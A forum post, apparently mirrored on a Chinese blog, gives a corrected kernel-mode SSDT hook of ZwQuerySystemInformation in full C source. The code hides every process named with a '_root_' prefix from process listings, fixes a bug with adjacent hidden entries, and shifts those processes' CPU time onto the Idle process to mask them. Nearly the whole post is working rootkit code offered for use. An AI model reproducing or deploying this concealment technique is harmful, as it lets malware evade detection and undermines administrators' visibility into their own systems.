SSDT hook example (hiding processes) correction
By: Orkblutt
just to make a little correction on that example ( http://www.rootkit.com/vault/fuzen_op/HideProcessesHookMDL.zip )
I've noticed that when some intances of the process we want to hide are running contigous, that example code is missing something and not hiding all instances.
there's a way to make the job correctly:
enjoy...
 |
By: Orkblutt Hi all,
just to make a little correction on that example ( http://www.rootkit.com/vault/fuzen_op/HideProcessesHookMDL.zip )
I've noticed that when some intances of the process we want to hide are running contigous, that example code is missing something and not hiding all instances.
there's a way to make the job correctly:
///
// NewZwQuerySystemInformation function
//
// ZwQuerySystemInformation() returns a linked list of processes.
// The function below imitates it, except it removes from the list any
// process who's name begins with "_root_".
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );
if( NT_SUCCESS(ntStatus))
{
// Asking for a file and directory listing
if(SystemInformationClass == 5)
{
// This is a query for the process list.
// Look for process names that start with
// '_root_' and filter them out.
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{
int bContigousInstance = 0;
//DbgPrint("Current item is %x/n", curr);
if (curr->ProcessName.Buffer != NULL)
{
if(0 == memcmp(curr->ProcessName.Buffer, L"_root_", 12))
{
m_UserTime.QuadPart += curr->UserTime.QuadPart;
m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
if(prev) // Middle or Last entry
{
if(curr->NextEntryDelta)
{
//check if the next process need to be hidded
if(((struct _SYSTEM_PROCESSES *)((char *)curr + curr->NextEntryDelta))->ProcessName.Buffer != NULL)
if( 0 == memcmp (((struct _SYSTEM_PROCESSES *)((char *)curr + curr->NextEntryDelta))->ProcessName.Buffer, L"_root_", 12))
bContigousInstance = 1;
prev->NextEntryDelta += curr->NextEntryDelta;
}
else // we are last, so make prev the end
prev->NextEntryDelta = 0;
}
else
{
if(curr->NextEntryDelta)
{
if(((struct _SYSTEM_PROCESSES *)((char *)curr + curr->NextEntryDelta))->ProcessName.Buffer != NULL)
if( 0 == memcmp (((struct _SYSTEM_PROCESSES *)((char *)curr + curr->NextEntryDelta))->ProcessName.Buffer, L"_root_", 12))
bContigousInstance = 1;
// we are first in the list, so move it forward
(char *)SystemInformation += curr->NextEntryDelta;
}
else // we are the only process!
SystemInformation = NULL;
}
}
}
else // This is the entry for the Idle process
{
// Add the kernel and user times of _root_*
// processes to the Idle process.
curr->UserTime.QuadPart += m_UserTime.QuadPart;
curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
// Reset the timers for next time we filter
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
}
if(!bContigousInstance)
prev = curr;
if(curr->NextEntryDelta)
((char *)curr += curr->NextEntryDelta);
else
curr = NULL;
}
}
else if (SystemInformationClass == 8) // Query for SystemProcessorTimes
{
struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
}
}
return ntStatus;
}
enjoy...
扫一扫
3287
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
